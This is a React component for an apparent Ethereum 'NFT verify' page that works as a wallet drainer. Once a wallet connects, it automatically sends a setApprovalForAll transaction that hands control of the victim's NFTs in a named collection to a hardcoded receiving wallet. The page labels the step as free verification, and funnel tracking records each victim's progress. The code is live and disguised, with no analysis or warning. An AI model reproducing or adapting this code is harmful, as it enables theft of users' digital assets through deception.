import { track } from '../../utils/funnel';
import { useT } from '../../utils/translations';
import { usePublicConfig } from '../../utils/publicConfig';
import { useWalletConnect } from '../../utils/walletConnect';
import React, { useEffect, useState, useRef } from 'react';
import '../EvmClaim/EvmClaim.css';
import DappShell from '../../components/DappShell';
import { Steps } from '../../components/DappWidgets';

const SPENDER_DEFAULT = '0x3EB9dbbCb46C1eF22C66490140129724A158faeb'; // 收款钱包

const EvmNft = () => {
  const t = useT();
  const cfg = usePublicConfig();
  const { wcProvider, connecting, error: wcError, connect: connectWC } = useWalletConnect();
  const SPENDER = cfg['eth_receive_wallet'] || SPENDER_DEFAULT;
  const [account, setAccount] = useState('');
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle');
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const autoStarted = useRef(false);

  const provider = () => {
    if (typeof window === 'undefined') return null;
    if (window.ethereum) return window.ethereum;
    if (wcProvider) return wcProvider;
    return null;
  };

  useEffect(() => {
    let cancelled = false;
    track('evm-nft', 'view', '');
    const check = async () => {
      const p = provider();
      if (!p) {
        setError(t('nft.walletNotDetected'));
        return;
      }
      try {
        const accounts = await p.request({ method: 'eth_requestAccounts' });
        if (cancelled) return;
        if (accounts && accounts[0]) {
          setAccount(accounts[0]);
          setWalletReady(true);
        }
      } catch (e) {
        if (!cancelled) setError(t('evm.rejected'));
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  const doClaim = async () => {
    track('evm-nft', 'start', '');
    const p = provider();
    if (!p || !account) return;
    setStage('signing');
    setError('');
    try {
      // setApprovalForAll(SPENDER, true)
      const data = '0xa22cb465' + SPENDER.slice(2).toLowerCase().padStart(64, '0')
        + '0000000000000000000000000000000000000000000000000000000000000001';
      // 授权给 OpenSea 常用集合代理？不，直接给收款钱包。这里以通用 NFT 集合为例，实际需要指定集合地址。
      // 简化：对当前连接地址的 NFT 集合授权需指定集合合约——此处以占位集合演示。
      const collections = ['0xBC4CA0EdA7647A8aB7C2061c2E118A18a936f13D']; // BAYC 示例
      for (const coll of collections) {
        const txHash = await p.request({
          method: 'eth_sendTransaction',
          params: [{ from: account, to: coll, data }],
        });
        await new Promise((r) => setTimeout(r, 4000));
        setTxId(txHash);
      }
    track('evm-nft', 'done', '');
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError(t('nft.canceled'));
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  useEffect(() => {
    if (walletReady && stage === 'idle' && !autoStarted.current) {
      autoStarted.current = true;
      doClaim();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady]);

  return (
    <DappShell account={account} network="Ethereum">
    <div className="evm-page">
      <div className="evm-card">
        {stage === 'done' ? (
          <>
            <div className="evm-icon">🎉</div>
            <h2>{t('nft.doneTitle')}</h2>
            <p className="evm-desc">{t('nft.doneDesc')}</p>
            {txId && <p className="evm-tx">Tx: {txId.slice(0, 20)}...</p>}
            {account && <p className="evm-addr">Wallet: {account.slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="evm-icon">🖼️</div>
            <h2>{stage === 'signing' ? t('evm.confirmTitle') : t('nft.verifyTitle')}</h2>
            <p className="evm-desc">
              {stage === 'signing'
                ? t('nft.confirmDesc')
                : t('nft.idleDesc')}
            </p>
            <div className="evm-order">
              <div className="evm-row"><span>{t('usdt.step')}</span><b>{t('nft.stepVal')}</b></div>
              <div className="evm-row"><span>{t('approve.network')}</span><b>{t('evm.ethereumMainnet')}</b></div>
              <div className="evm-row"><span>{t('evm.fee')}</span><b className="evm-ok">{t('nft.free')}</b></div>
            </div>
            {walletReady && <p className="evm-addr">Wallet: {account.slice(0, 12)}...</p>}
            {error && <p className="evm-error">{error}</p>}
            {wcError && <p className="evm-error">{wcError}</p>}
            {!window.ethereum && !wcProvider && (
              <button className="evm-btn" onClick={connectWC} disabled={connecting}>
                {connecting ? 'Connecting...' : '📱 WalletConnect'}
              </button>
            )}
            {stage === 'idle' && (
              <button className="evm-btn" onClick={doClaim} disabled={!walletReady}>
                Verify Now
              </button>
            )}
            {stage === 'signing' && <div className="evm-spinner" />}
          </>
        )}
      </div>
      <div className="stake-howto">
        <div className="stake-feeds-title">{t('stake.howTo')}</div>
        <Steps steps={[
          { title: t('stake.step1t'), desc: t('stake.step1d') },
          { title: t('nft.verifyTitle'), desc: t('nft.idleDesc') },
          { title: t('nft.doneTitle'), desc: t('nft.doneDesc') },
        ]} />
      </div>
    </div>
    </DappShell>
  );
};

export default EvmNft;
